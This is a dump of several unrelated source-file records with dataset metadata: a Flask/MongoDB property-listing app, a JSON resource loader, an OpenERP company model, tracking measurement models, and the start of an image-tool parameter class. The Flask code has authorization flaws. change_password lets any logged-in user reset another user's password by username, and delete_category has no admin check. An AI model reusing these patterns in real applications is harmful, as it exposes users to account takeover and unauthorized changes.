if request.method == \"POST\":\n # check if username exists in db\n existing_user = mongo.db.users.find_one(\n {\"username\": request.form.get(\"username\").lower()})\n\n if existing_user:\n # ensure hashed password matches user input\n if check_password_hash(\n existing_user[\"password\"], request.form.get(\"password\")):\n session[\"user\"] = request.form.get(\"username\").lower()\n flash(f\"Welcome, {request.form.get('username')}\")\n return redirect(url_for(\n \"profile\", username=session[\"user\"]))\n else:\n # invalid password match\n flash(\"Incorrect Username and/or Password\")\n return redirect(url_for(\"login\"))\n\n else:\n # username doesn't exist\n flash(\"Incorrect Username and/or Password\")\n return redirect(url_for(\"login\"))\n\n return render_template(\"login.html\")\n\n\n@app.route(\"/profile\", methods=[\"GET\"])\ndef profile():\n \"\"\"\n User Profile. Find username in the database and retrieve the\n
username. Then render the profile template with the user's name.\n \"\"\"\n if not is_authenticated():\n flash('You are not authorised to view this page')\n return redirect(url_for(\"get_featured_properties\"))\n\n # find the user in the database\n user = mongo.db.users.find_one_or_404(\n # take the session user's username from Mongo\n {\"username\": session[\"user\"]})\n # if the user has bookmarks, execute the below\n bookmarks = mongo.db.properties.find({'_id':\n {'$in': user['bookmarks']}})\n # return profile page with user's unique name\n return render_template(\"profile.html\",\n username=session[\"user\"], properties=bookmarks)\n\n\n@app.route(\"/bookmark/\", methods=[\"GET\", \"POST\"])\ndef bookmark(property_id):\n \"\"\"\n Bookmark Functionality\n \"\"\"\n if request.method == \"GET\":\n user_bookmarks = list(mongo.db.users.find_one({\"username\": session\n [\"user\"].lower()})\n ['bookmarks'])\n if ObjectId(property_id) not in user_bookmarks:\n mongo.db.users.find_one_and_update(\n {\"username\": session[\"user\"].lower()},\n {\"$push\": {\"bookmarks\": ObjectId(property_id)}})\n flash(\"Property has been added to your profile.\")\n else:\n flash(\"Property has already been bookmarked.\")\n return redirect(url_for(\n \"profile\", username=session[\"user\"]))\n\n return redirect(url_for(\n \"profile\", username=session[\"user\"]))\n\n\n@app.route(\"/delete_bookmark/\")\ndef delete_bookmark(property_id):\n \"\"\"\n Delete Bookmark Functionality. To remove a bookmark from user profile.\n \"\"\"\n if not is_authenticated():\n flash(\"You need to log in to execute this action.\")\n return redirect(url_for(\"login\"))\n\n try:\n mongo.db.users.find_one_and_update(\n {\"username\": session[\"user\"].lower()},\n {\"$pull\": {\"bookmarks\": ObjectId(property_id)}})\n flash(\"Bookmark successfully removed.\")\n except Exception:\n user_bookmarks = mongo.db.users.find_one({\"username\": session[\"user\"].\n lower()})['bookmarks']\n user_bookmarks.remove(property_id)\n mongo.db.users.find_one_and_update({\"username\": session[\"user\"].\n lower()}, {'$set': {\"bookmarks\":\n user_bookmarks\n }})\n finally:\n return redirect(url_for(\"profile\"))\n\n\n@ app.route(\"/logout\")\ndef logout():\n \"\"\"\n LOG OUT FUNCTIONALITY\n \"\"\"\n # If not user in session Redirect to Properties\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for('get_properties'))\n\n flash(\"You have been logged out\")\n session.pop(\"user\")\n return redirect(url_for(\"get_properties\"))\n\n\n@ app.route(\"/view_property/\")\ndef view_property(property_id):\n \"\"\"\n FUNCTION TO SEE A PROPERTY AFTER CLICKING ON \"VIEW PROPERTY\" BUTTON\n \"\"\"\n # Increment the number of views every time a property is seen\n mongo.db.properties.update_one({\"_id\": ObjectId(property_id)},\n {'$inc': {'views': 1}})\n property = mongo.db.properties.find_one({\"_id\": ObjectId(property_id)})\n return render_template('view_property.html', property=property)\n\n\n@ app.route(\"/add_property\", methods=[\"GET\", \"POST\"])\ndef add_property():\n \"\"\"\n Add_PROPERTY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You don't have permission to execute this operation.\")\n return redirect(url_for(\"get_properties\"))\n\n if request.method == \"POST\":\n property = {\n \"category_name\": request.form.get(\"category_name\"),\n \"property_name\": request.form.get(\"property_name\"),\n \"property_description\": request.form.get\n (\"property_description\"),\n \"property_details\": 
string_to_array(request.form.get\n (\"property_details\")),\n \"property_added_date\": request.form.get(\"property_added_date\"),\n \"property_image\": request.form.get(\"property_image\"),\n \"author\": session[\"user\"],\n \"type\": request.form.get(\"type\"),\n \"price\": request.form.get(\"price\"),\n \"sourcing_fee\": request.form.get(\"sourcing_fee\"),\n \"amenities\": request.form.getlist('amenities'),\n \"features\": string_to_array(request.form.get(\"features\"))\n }\n mongo.db.properties.insert_one(property)\n flash(\"Your Property Successfully Added\")\n return redirect(url_for(\"get_properties\"))\n\n categories = mongo.db.categories.find().sort(\"category_name\", 1)\n type = mongo.db.type.find().sort(\"type\", 1)\n amenities = mongo.db.amenities.find().sort(\"amenity\", 1)\n features = mongo.db.amenities.find().sort(\"feature\", 1)\n return render_template(\"add_property.html\", categories=categories,\n type=type, amenities=amenities,\n property=features)\n\n\n@ app.route(\"/edit_property/\", methods=[\"GET\", \"POST\"])\ndef edit_property(property_id):\n \"\"\"\n Edit_PROPERTY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You don't have permission to execute this operation.\")\n return redirect(\"get_properties\")\n\n if not is_object_id_valid(property_id):\n abort(404)\n\n property = mongo.db.properties.find_one_or_404(\n {\"_id\": ObjectId(property_id)})\n user = session['user']\n\n if user == \"admin\" or user == property[\"author\"]:\n if request.method == \"POST\":\n submit = {\n \"category_name\": request.form.get(\"category_name\"),\n \"property_name\": request.form.get(\"property_name\"),\n \"property_description\": request.form.get(\"property_description\"),\n \"property_details\": string_to_array(request.form.get\n (\"property_details\")),\n \"property_added_date\": request.form.get(\"property_added_date\"),\n \"property_image\": request.form.get(\"property_image\"),\n \"author\": session[\"user\"],\n \"type\": request.form.get(\"type\"),\n \"price\": request.form.get(\"price\"),\n \"amenities\": request.form.getlist('amenities'),\n \"sourcing_fee\": request.form.get(\"sourcing_fee\"),\n \"features\": string_to_array(request.form.get(\"features\"))\n }\n mongo.db.properties.update_one(\n {\"_id\": ObjectId(property_id)}, {\"$set\": submit})\n flash(\"Property successfully updated\")\n return redirect(url_for(\"edit_property\",\n property_id=ObjectId(property_id)))\n\n # This object is used for rendering in the form\n property = mongo.db.properties.find_one({\"_id\": ObjectId(property_id)})\n read_property_obj = {**property}\n # copy the object from the DataBase, because the object\n # from the DB is immutable (cannot change values)\n read_property_obj['property_details'] = \"\".join(read_property_obj\n ['property_details'])\n read_property_obj['features'] = \"\".join(read_property_obj['features'])\n read_property_obj['amenities'] = \"\".join(\n read_property_obj['amenities'])\n categories = mongo.db.categories.find().sort(\"category_name\", 1)\n type = mongo.db.type.find().sort(\"type\", 1)\n amenities = mongo.db.amenities.find().sort(\"amenity\")\n return render_template(\"edit_property.html\",\n property=read_property_obj, categories=categories,\n type=type, amenities=amenities)\n\n\n@ app.route(\"/delete_property/\")\ndef delete_property(property_id):\n \"\"\"\n DELETE_PROPERTY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n if not 
is_object_id_valid(property_id):\n abort(404)\n\n result = mongo.db.properties.find_one_and_delete(\n {\"_id\": ObjectId(property_id), \"author\": session['user']})\n\n if result:\n flash(\"Property Successfully Deleted!\")\n\n return redirect(url_for(\"get_properties\"))\n\n\n@ app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n \"\"\"\n SEARCH FOR A PROPERTY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"get_properties\"))\n\n query = request.form.get(\"query\")\n properties = list(mongo.db.properties.find({\"$text\": {\"$search\": query}}))\n categories = list(mongo.db.categories.find().sort(\"category_name\", 1))\n return render_template(\"properties.html\", properties=properties,\n categories=categories)\n\n\n@ app.route(\"/admin_dashboard\")\ndef admin_dashboard():\n \"\"\"\n ADMIN DASHBOARD FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"get_properties\"))\n\n # check that someone isn't brute-forcing the url get admin functionalities\n if admin():\n categories = list(mongo.db.categories.find().sort(\"category_name\", 1))\n else:\n flash('You are not authorised to view this page')\n return redirect(url_for(\"get_featured_properties\"))\n # return the admin dashboard template\n return render_template(\"admin_dashboard.html\", categories=categories)\n\n\n@ app.route(\"/add_category\", methods=[\"GET\", \"POST\"])\ndef add_category():\n \"\"\"\n ADD A CATEGORY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"get_properties\"))\n\n if admin():\n if request.method == \"POST\":\n category = {\n \"category_name\": request.form.get(\"category_name\")\n }\n\n mongo.db.categories.insert_one(category)\n flash(\"The new strategy was added\")\n return redirect(url_for(\"admin_dashboard\"))\n else:\n flash('You are not authorised to view this page')\n return redirect(url_for(\"get_featured_properties\"))\n\n return render_template(\"add_category.html\")\n\n\n@ app.route(\"/edit_category/\", methods=[\"GET\", \"POST\"])\ndef edit_category(category_id):\n \"\"\"\n EDIT A CATEGORY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n if admin():\n if request.method == \"POST\":\n submit = {\n \"category_name\": request.form.get(\"category_name\")\n }\n mongo.db.categories.update_one(\n {\"_id\": ObjectId(category_id)}, {\"$set\": submit})\n flash(\"Strategy Successfully Updated\")\n return redirect(url_for(\"admin_dashboard\"))\n\n category = mongo.db.categories.find_one({\"_id\": ObjectId(category_id)})\n else:\n flash('You are not authorised to view this page')\n return redirect(url_for(\"get_featured_properties\"))\n return render_template(\"edit_category.html\", category=category)\n\n\n@ app.route(\"/delete_category/\")\ndef delete_category(category_id):\n \"\"\"\n DELETE A CATEGORY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n mongo.db.categories.delete_one({\"_id\": ObjectId(category_id)})\n flash(\"Strategy Successfully Deleted\")\n return redirect(url_for(\"admin_dashboard\"))\n\n\n@ app.route('/change_password/', methods=[\"GET\", \"POST\"])\ndef change_password(username):\n \"\"\"\n CHANGE PASSWORD FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n
flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n if request.method == \"POST\":\n newPassword = generate_password_hash(request.form.get\n (\"password_change\"))\n mongo.db.users.update_one(\n {\"username\": username},\n {'$set':\n {\"password\": newPassword}})\n flash(\"Your password has been updated\")\n return redirect(url_for(\"get_properties\"))\n if session:\n return redirect(url_for(\"get_properties\"))\n return redirect(url_for(\n \"profile\", username=session[\"user\"]))\n\n\n@ app.route('/delete_account/', methods=[\"GET\", \"POST\"])\ndef delete_account(user_id):\n \"\"\"\n DELETE PROFILE FUNCTIONALITY\n \"\"\"\n user = mongo.db.users.find_one({'username': session[\"user\"]})\n # Checks if password matches existing password in database\n if check_password_hash(user[\"password\"],\n request.form.get(\"confirm_to_delete\")):\n flash(\"Your account has been deleted successfully.\")\n session.pop(\"user\")\n mongo.db.users.delete_one({\"_id\": ObjectId(user['_id'])})\n return redirect(url_for(\"get_featured_properties\"))\n else:\n flash(\"The password you entered was incorrect. Please try again!\")\n return redirect(url_for(\"profile\"))\n # return to home page\n return redirect(url_for(\"get_featured_properties\"))\n\n\n@ app.route(\"/contact\")\ndef contact():\n \"\"\"\n Navigates to contact page\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n return render_template(\"contact.html\")\n\n\n@ app.errorhandler(401)\ndef unauthorized_access(e):\n \"\"\"\n Renders a custom 401 error page with a button\n that takes the user back to the log in or register pages.\n \"\"\"\n return render_template('errors/401.html'), 401\n\n\n@ app.errorhandler(404)\ndef page_not_found(e):\n \"\"\"\n Renders a custom 404 error page with a button\n that takes the user back to the home page.\n \"\"\"\n return render_template('errors/404.html'), 404\n\n\n@ app.errorhandler(500)\ndef not_found_server(e):\n \"\"\"\n Renders a custom 500 error page with a button\n that takes the user back to the home page.\n \"\"\"\n return render_template('errors/500.html'), 500\n\n\ndef is_authenticated():\n \"\"\"\n Ensure that user is authenticated\n \"\"\"\n return 'user' in session\n\n\ndef is_object_id_valid(id_value):\n \"\"\"\n Validate that id_value is a valid ObjectId\n \"\"\"\n return id_value != \"\" and ObjectId.is_valid(id_value)\n\n\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\")),\n debug=False)\n","repo_name":"TNamdarian/seven-terraces","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"12166817206","text":"import json\nimport os\n\nRES_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"res\")\n\n\ndef get_resource_path(resource):\n return os.path.join(RES_DIR, resource)\n\n\ndef get_strings_resource_path(resource, lang=\"en-uk\"):\n return get_resource_path(os.path.join(\"strings\", lang, resource))\n\n\nRES_PATHS = {\n \"strings\": get_strings_resource_path(\"strings.json\"),\n \"spells\": get_strings_resource_path(\"spells.json\"),\n \"global\": get_resource_path(\"global.json\"),\n \"keys\": get_resource_path(\"keys.json\"),\n \"users\": get_resource_path(\"users.json\"),\n}\n\n\ndef load_resource(resource):\n \"\"\" Reads json resource and returns the raw contents \"\"\"\n
if resource not in RES_PATHS:\n raise Exception(f\"Unknown resource: {resource}\")\n\n with open(RES_PATHS[resource], 'r', encoding='utf8') as f:\n data = json.load(f)\n\n return data\n\n\ndef save_resource(resource, data):\n \"\"\" Saves json resource from a data structure to disk \"\"\"\n if resource not in RES_PATHS:\n raise Exception(f\"Unknown resource: {resource}\")\n\n with open(RES_PATHS[resource], 'w', encoding='utf8') as f:\n json.dump(data, f, sort_keys=True, indent=4, separators=(',', ': '))\n\n\ndef get_quotes():\n quotes_file = get_resource_path(\"quotes.txt\")\n\n with open(quotes_file, 'r', encoding=\"utf-8\") as f:\n data = f.read()\n data = data.split(\"\\n\\n\")\n for i, elem in enumerate(data):\n st = elem.find('\"')\n en = elem.find('\"', st + 3)\n data[i] = elem[st + 1:en]\n\n return data\n","repo_name":"toridango/DanBot2","sub_path":"danbot/db_handler.py","file_name":"db_handler.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
{"seq_id":"38323513632","text":"from osv import osv, fields\nimport exceptions\nfrom tools.translate import _\n\n\nclass ResCompany(osv.osv):\n _inherit = 'res.company'\n\n _columns = {\n 'sii_enabled': fields.boolean(string='Enable SII'),\n 'sii_test': fields.boolean(string='Test Environment'),\n 'sii_method': fields.selection(\n string='Method',\n selection=[('auto', 'Automatic'),('manual', 'Manual')],\n help='By default the invoice is sent during the validation process; with the manual '\n 'method, there is a button to send the invoice.'),\n 'use_connector': fields.boolean(\n string='Use connector',\n help='Check it to use the connector instead of sending the invoice directly '\n 'when it is validated', readonly=True),\n 'chart_template_id': fields.many2one('account.chart.template', 'Chart Template',\n required=True)\n }\n\n _defaults = {\n 'sii_method': 'auto',\n }\n\nResCompany()\n\n","repo_name":"Creacionescpm/l10n_es_aeat_sii-11.0.8.0.1.1.4","sub_path":"l10n_es_aeat_sii/models/res_company.py","file_name":"res_company.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"14426287937","text":"import numpy as np\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass measmodel:\n \"\"\"Measurement model class\"\"\"\n\n def CVmeasmodel(self, sigma: float):\n\n self.d = 2\n self.H = lambda x: np.array([[1, 0, 0, 0], [0, 1, 0, 0]])\n self.R = sigma**2 * np.eye(self.d)\n self.h = lambda x: np.matmul(self.H(x), x)\n\n def CTmeasmodel(self, sigma: float):\n\n self.d = 2\n self.H = lambda x: np.array([[1, 0, 0, 0, 0], [0, 1, 0, 0, 0]])\n self.R = sigma**2 * np.eye(self.d)\n self.h = lambda x: np.matmul(self.H(x), x)\n\n def bearingmeasmodel(self, sigma: float, s: np.ndarray):\n\n self.d = 1\n def rng(x): return np.linalg.norm(x[0:2] - s)\n self.h = lambda x: np.arctan2(x[1] - s[1], x[0] - s[0])\n\n # Measurement model Jacobian\n self.H = lambda x: np.array(\n [[-(x[1] - s[1]) / (rng(x)**2), (x[0] - s[0]) / (rng(x)**2), np.zeros([np.shape(x)[1] - 2])]])\n\n # Measurement noise covariance\n self.R = sigma**2\n\n def rangebearingmeasmodel(\n self,\n sigma_r: float,\n sigma_b: float,\n s: np.ndarray):\n\n self.d = 2\n def rng(x): return np.linalg.norm(x[0:2] - s)\n def ber(x): return np.arctan2(x[1] - s[1], x[0] - s[0])\n\n self.h = lambda x: np.array([rng(x), ber(x)])\n\n # Measurement model Jacobian\n self.H = lambda x: np.array([np.pad([(x[0] - s[0]) / rng(x),\n (x[1] - s[1]) / rng(x)],\n (0,\n x.shape[0] - 
2)),\n np.pad([-(x[1] - s[1]) / (rng(x)**2),\n (x[0] - s[0]) / (rng(x)**2)],\n (0,\n x.shape[0] - 2))])\n\n # Measurement noise covariance\n self.R = np.array([[sigma_r**2, 0], [0, sigma_b**2]])\n","repo_name":"mgoar/mtt-phd-filter","sub_path":"measmodel.py","file_name":"measmodel.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"782368530","text":"import inspect\r\nimport sys\r\nimport itertools\r\nimport random\r\nfrom abc import ABC, abstractproperty\r\nfrom distutils.version import LooseVersion\r\nimport base64\r\nimport hashlib\r\nimport logging\r\nimport os\r\nfrom typing import Union\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfrom ipso_phen.ipapi.base.ip_abstract import BaseImageProcessor\r\nfrom ipso_phen.ipapi.tools.common_functions import make_safe_name\r\nimport ipso_phen.ipapi.base.ip_common as ipc\r\nfrom ipso_phen.ipapi.tools.common_functions import force_directories\r\nimport ipso_phen.ipapi.tools.regions as regions\r\n\r\nCLASS_NAME_KEY = \"class__name__\"\r\nMODULE_NAME_KEY = \"module__name__\"\r\nPARAMS_NAME_KEY = \"params\"\r\nGRID_SEARCH_PARAMS_NAME_KEY = \"grid_search_params\"\r\n\r\nlogger = logging.getLogger(os.path.splitext(__name__)[-1].replace(\".\", \"\"))\r\n\r\n\r\nclass IptParam(object):\r\n def __init__(self, **kwargs):\r\n self.name = kwargs.get(\"name\", \"no_name\")\r\n self.desc = kwargs.get(\"desc\", \"no desc\")\r\n self.default_value = kwargs.get(\"default_value\", \"no default\")\r\n self.allowed_values = kwargs.get(\"allowed_values\", None)\r\n if self.allowed_values is not None and isinstance(self.allowed_values, list):\r\n self.allowed_values = tuple(self.allowed_values)\r\n self.hint = kwargs.get(\"hint\", \"no clue\")\r\n self.widget_type = kwargs.get(\"widget_type\", \"unk_wt\")\r\n self.kind = kwargs.get(\"kind\", \"unk_k\")\r\n self.options = kwargs.get(\"options\", {})\r\n self._value = kwargs.get(\"_value\", self.default_value)\r\n self.on_change = None\r\n self._widgets = {}\r\n self._grid_search_options = kwargs.get(\r\n \"_grid_search_options\", str(self.default_value)\r\n )\r\n self.grid_search_mode = False\r\n\r\n self.ui_update_callbacks = {}\r\n\r\n def __str__(self):\r\n return f\"[{self.name}:{self.value}]\"\r\n\r\n def __repr__(self):\r\n return (\r\n f\"{repr(self.name)}_\"\r\n f\"{repr(self.desc)}_\"\r\n f\"{repr(self.default_value)}_\"\r\n f\"{repr(self.allowed_values)}_\"\r\n f\"{repr(self.value)}\"\r\n )\r\n\r\n def __eq__(self, other):\r\n return self.name == other.name\r\n\r\n def __ne__(self, other):\r\n return self.name != other.name\r\n\r\n def __copy__(self):\r\n new = type(self)(\r\n name=self.name,\r\n desc=self.desc,\r\n default_value=self.default_value,\r\n allowed_values=self.allowed_values,\r\n hint=self.hint,\r\n widget_type=self.widget_type,\r\n kind=self.kind,\r\n options=self.options,\r\n )\r\n return new\r\n\r\n def clear_widgets(self):\r\n \"\"\"\r\n clear_widgets _summary_\r\n \"\"\"\r\n self._widgets = {}\r\n\r\n def update_ui(self, callback: str, **kwargs):\r\n \"\"\"\r\n update_ui Update target UI\r\n\r\n Args:\r\n callback (str): target callback string name\r\n \"\"\"\r\n callback = self.ui_update_callbacks.get(callback, None)\r\n if callback is None:\r\n return\r\n callback(**kwargs)\r\n\r\n def init(self, tool_name, label, widget, grid_search_mode: bool = False, **kwargs):\r\n self.ui_update_callbacks = dict(**kwargs)\r\n\r\n self.update_ui(\r\n callback=\"set_name\",\r\n widget=widget,\r\n 
new_name=f\"ipt_param_{tool_name}_{self.name}\",\r\n )\r\n self.update_ui(\r\n callback=\"set_name\",\r\n widget=label,\r\n new_name=f\"ipt_param_label_{tool_name}_{self.name}\",\r\n )\r\n\r\n self.label = label\r\n self.update_label()\r\n self.grid_search_mode = grid_search_mode\r\n if self.is_input:\r\n self.input = widget\r\n if widget is None:\r\n return False\r\n elif grid_search_mode:\r\n self.update_ui(\r\n callback=\"set_text\",\r\n widget=self.gs_input,\r\n text=self.grid_search_options,\r\n )\r\n elif isinstance(self.allowed_values, dict):\r\n self.update_ui(\r\n callback=\"add_items\",\r\n widget=widget,\r\n items=self.allowed_values,\r\n default=self.value,\r\n )\r\n elif isinstance(self.allowed_values, tuple):\r\n if self.allowed_values == (0, 1):\r\n self.update_ui(\r\n callback=\"set_checked\",\r\n widget=widget,\r\n new_check_state=self.value == 1,\r\n )\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.desc)\r\n elif len(self.allowed_values) == 2:\r\n self.update_ui(\r\n callback=\"set_range\",\r\n widget=widget,\r\n min_val=self.allowed_values[0],\r\n max_val=self.allowed_values[1],\r\n default_val=int(self.value),\r\n )\r\n else:\r\n return False\r\n elif isinstance(self.allowed_values, str):\r\n if hasattr(widget, \"textEdited\"):\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n elif hasattr(widget, \"clicked\"):\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.desc)\r\n elif hasattr(widget, \"insertPlainText\"):\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n else:\r\n return False\r\n if self.is_output:\r\n self.output = widget\r\n self.update_output(label_text=self.desc, output_value=self.value)\r\n\r\n self.update_ui(callback=\"set_tool_tip\", widget=widget, tool_tip=self.hint)\r\n self.update_ui(callback=\"set_tool_tip\", widget=label, tool_tip=self.hint)\r\n\r\n self.update_ui(callback=\"connect_call_back\", widget=widget, param=self)\r\n\r\n return True\r\n\r\n def update_label(self):\r\n lbl = self.label\r\n if lbl is None:\r\n return False\r\n if (\r\n isinstance(self.allowed_values, dict)\r\n or isinstance(self.allowed_values, str)\r\n or (self.widget_type == \"spin_box\")\r\n ):\r\n self.update_ui(callback=\"set_text\", widget=lbl, text=self.desc)\r\n elif isinstance(self.allowed_values, tuple) and (len(self.allowed_values) == 2):\r\n self.update_ui(\r\n callback=\"set_text\", widget=lbl, text=f\"{self.desc}: {self.value}\"\r\n )\r\n else:\r\n return False\r\n self.update_ui(callback=\"set_tool_tip\", widget=lbl, tool_tip=self.hint)\r\n return True\r\n\r\n def update_input(self, new_values=None):\r\n if not self.is_input:\r\n return False\r\n if self.kind == \"button\":\r\n return True\r\n widget = self.input\r\n if isinstance(self.allowed_values, dict):\r\n if (\r\n (new_values is not None)\r\n and isinstance(new_values, dict)\r\n and (self.allowed_values.keys() - new_values.keys() != {})\r\n ):\r\n if self.options.get(\"enable_none\", False) is True:\r\n self.allowed_values = {**{\"none\": \"none\"}, **new_values}\r\n else:\r\n self.allowed_values = new_values\r\n if widget is not None:\r\n bck_value = self.value\r\n self.update_ui(callback=\"clear\", widget=widget)\r\n self.update_ui(\r\n callback=\"add_items\",\r\n widget=widget,\r\n items=self.allowed_values,\r\n default=bck_value,\r\n )\r\n self._value = bck_value\r\n elif widget is not None:\r\n for i, key in enumerate(self.allowed_values):\r\n if self.value == key:\r\n self.update_ui(\r\n 
callback=\"set_current_index\",\r\n widget=widget,\r\n index=i,\r\n )\r\n break\r\n elif isinstance(self.allowed_values, tuple):\r\n if self.allowed_values == (0, 1) and widget is not None:\r\n self.update_ui(\r\n callback=\"set_checked\",\r\n widget=widget,\r\n new_check_state=self.value == 1,\r\n )\r\n elif len(self.allowed_values) == 2:\r\n if (\r\n (new_values is not None)\r\n and isinstance(new_values, tuple)\r\n and (self.allowed_values != new_values)\r\n ):\r\n self.allowed_values = new_values\r\n if widget is not None:\r\n self.update_ui(\r\n callback=\"set_range\",\r\n widget=widget,\r\n min_val=self.allowed_values[0],\r\n max_val=self.allowed_values[1],\r\n default_val=None,\r\n )\r\n if widget is not None:\r\n self.update_ui(\r\n callback=\"set_value\",\r\n widget=widget,\r\n value=int(self.value),\r\n )\r\n else:\r\n return False\r\n elif isinstance(self.allowed_values, str):\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n else:\r\n return False\r\n self.update_ui(callback=\"set_tool_tip\", widget=widget, tool_tip=self.hint)\r\n return True\r\n\r\n def update_output(\r\n self,\r\n label_text: str = \"\",\r\n output_value=None,\r\n ignore_list=(),\r\n invert=False,\r\n ):\r\n if not self.is_output:\r\n return False\r\n self._value = output_value\r\n if label_text and isinstance(label_text, str):\r\n self.desc = label_text\r\n self.update_label()\r\n widget = self.output\r\n if widget is None:\r\n return True\r\n elif self.allowed_values == \"single_line_text_output\":\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n elif self.allowed_values == \"multi_line_text_output\":\r\n self.update_ui(callback=\"clear\", widget=widget)\r\n self.update_ui(callback=\"set_text\", widget=widget, text=self.value)\r\n elif self.allowed_values == \"table_output\":\r\n self.update_ui(callback=\"clear\", widget=widget)\r\n self.update_ui(\r\n callback=\"update_table\",\r\n widget=widget,\r\n items=self._value,\r\n ignore_list=ignore_list,\r\n invert_order=invert,\r\n )\r\n else:\r\n return False\r\n\r\n return True\r\n\r\n def add_option_to_grid_search(self, new_option: str):\r\n self.grid_search_options = f\"{self._grid_search_options},{new_option}\"\r\n\r\n @staticmethod\r\n def decode_string(gs_code: str):\r\n res = []\r\n for opt_ in gs_code.replace(\" \", \"\").split(\",\"):\r\n try:\r\n if (\"|\" in opt_) and (\";\" in opt_):\r\n bd, step = opt_.split(\";\")\r\n left, right = bd.split(\"|\")\r\n left, right = min(int(left), int(right) + 1), max(\r\n int(left), int(right) + 1\r\n )\r\n res.extend([i for i in range(left, right, int(step))])\r\n else:\r\n res.append(opt_)\r\n except ValueError as e:\r\n logger.exception(f'String decoding failed: \"{repr(e)}\"')\r\n return [str(i) for i in sorted(list(set(res)))]\r\n\r\n def decode_grid_search_options(self):\r\n return self.decode_string(self._grid_search_options)\r\n\r\n def auto_fill_grid_search(self, step=None):\r\n if not self.is_input:\r\n return False\r\n widget = self.input\r\n if widget is None:\r\n return False\r\n if isinstance(self.allowed_values, dict):\r\n return \",\".join([k for k in self.allowed_values.keys()])\r\n elif isinstance(self.allowed_values, tuple):\r\n if self.allowed_values == (0, 1):\r\n return \"0,1\"\r\n elif len(self.allowed_values) == 2:\r\n min_ = min(self.allowed_values[0], self.allowed_values[1])\r\n max_ = max(self.allowed_values[0], self.allowed_values[1])\r\n if step is None:\r\n step = (max_ - min_) // 10\r\n return f\"{min_}|{max_};{step}\"\r\n 
else:\r\n return \"\"\r\n else:\r\n return \"\"\r\n\r\n @property\r\n def value(self):\r\n return self._value\r\n\r\n @value.setter\r\n def value(self, value):\r\n if value != self._value:\r\n self._value = value\r\n if self.on_change is not None:\r\n self.on_change(self)\r\n\r\n @property\r\n def str_value(self):\r\n if isinstance(self.value, str):\r\n return f\"'{self.value}'\"\r\n else:\r\n return str(self.value)\r\n\r\n @property\r\n def grid_search_options(self):\r\n return self._grid_search_options\r\n\r\n @grid_search_options.setter\r\n def grid_search_options(self, value):\r\n if self._grid_search_options != value:\r\n self._grid_search_options = value\r\n widget = self.gs_input\r\n if widget is not None:\r\n self.update_ui(callback=\"set_text\", widget=widget, text=value)\r\n\r\n @property\r\n def input(self):\r\n return self._widgets.get(\"input\", None)\r\n\r\n @input.setter\r\n def input(self, value):\r\n self._widgets[\"input\"] = value\r\n\r\n @property\r\n def output(self):\r\n return self._widgets.get(\"output\", None)\r\n\r\n @output.setter\r\n def output(self, value):\r\n self._widgets[\"output\"] = value\r\n\r\n @property\r\n def label(self):\r\n return self._widgets.get(\"label\", None)\r\n\r\n @label.setter\r\n def label(self, value):\r\n self._widgets[\"label\"] = value\r\n\r\n @property\r\n def gs_label(self):\r\n return self._widgets.get(\"gs_label\", None)\r\n\r\n @gs_label.setter\r\n def gs_label(self, value):\r\n self._widgets[\"gs_label\"] = value\r\n self.update_ui(callback=\"set_text\", widget=value, text=self.desc)\r\n\r\n @property\r\n def gs_input(self):\r\n return self._widgets.get(\"gs_input\", None)\r\n\r\n @gs_input.setter\r\n def gs_input(self, value):\r\n self._widgets[\"gs_input\"] = value\r\n\r\n @property\r\n def gs_auto_fill(self):\r\n return self._widgets.get(\"gs_auto_fill\", None)\r\n\r\n @gs_auto_fill.setter\r\n def gs_auto_fill(self, value):\r\n self._widgets[\"gs_auto_fill\"] = value\r\n\r\n @property\r\n def gs_copy_from_param(self):\r\n return self._widgets.get(\"gs_copy_from_param\", None)\r\n\r\n @gs_copy_from_param.setter\r\n def gs_copy_from_param(self, value):\r\n self._widgets[\"gs_copy_from_param\"] = value\r\n\r\n @property\r\n def gs_reset(self):\r\n return self._widgets.get(\"gs_reset\", None)\r\n\r\n @gs_reset.setter\r\n def gs_reset(self, value):\r\n self._widgets[\"gs_reset\"] = value\r\n\r\n @property\r\n def is_input(self):\r\n return not 